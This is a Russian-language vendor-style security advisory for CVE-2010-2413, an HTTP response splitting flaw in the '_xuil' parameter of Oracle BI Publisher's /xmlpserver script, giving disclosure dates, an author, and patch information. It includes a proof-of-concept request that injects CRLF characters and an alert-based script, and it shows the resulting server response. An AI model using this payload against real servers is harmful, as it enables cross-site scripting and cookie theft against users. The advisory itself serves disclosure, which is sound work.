
CVE-2010-2413: Уязвимость типа Response Splitting в Oracle Business Intelligence (BI Publisher Enterprise)
Вендор
Oracle
Продукт
Oracle Business Intelligence Enterprise Edition (10.1.3.4.0)
Тип уязвимости
Расщепление ответа сервера, межсайтовый скриптинг, фишинг
Reported
03.03.2009
Date of Public Advisory
25.10.2010
Подтверждение
Автор
Александр Поляков
Детальное описание
Уязимость типа Response Splitting была вобнаружена в скрипте /xmlpserver, уязвимый параметр «_xuil»
При посылке запроса с символами CRLF в параметре «_xuil» можно формировать собственные ответы от сервера
Уязвимость можно использовать для внедрения межсайтового скриптинга в код ответа и кражи cookies пользователя.
Пример
request:
GET /xmlpserver/?_xuil=aaaaaaaaaa%0d%0a%0d%0a%0d%0a%0d%0a<html><script>alert(‘XSS’)</script> HTTP/1.0
Response:
HTTP/1.1 200 OK
Date: Tue, 03 Mar 2009 17:51:21 GMT
Server: Oracle Containers for J2EE
Content-Length: 7466
Set-Cookie: ORA_XDO_UI=aaaaaaaaaa
<html><script>alert(‘XSS’)</script>; Comment=Oracle XML Publisher Cookie; Domain=.0.0.0; Expires=Wed, 03-Mar-
2010 17:51:22 GMT; Path=/xmlpserver
Set-Cookie: JSESSIONID=ac10006525e85e9ceb6e5e4846d6bcd0e9ceb6a0b2a3; path=/xmlps
erver
Cache-Control: private
Connection: close
Content-Type: text/html; charset=UTF-8
<html LANG=»en-US» dir=»ltr»>…………………..
Решение
Данная уязвимость исправлена в пакете обновлений, вышедшем 12 октября 2010 года.
Все заказчики могут скачать и установить обновления, следуя инструкциям из официального Advisory.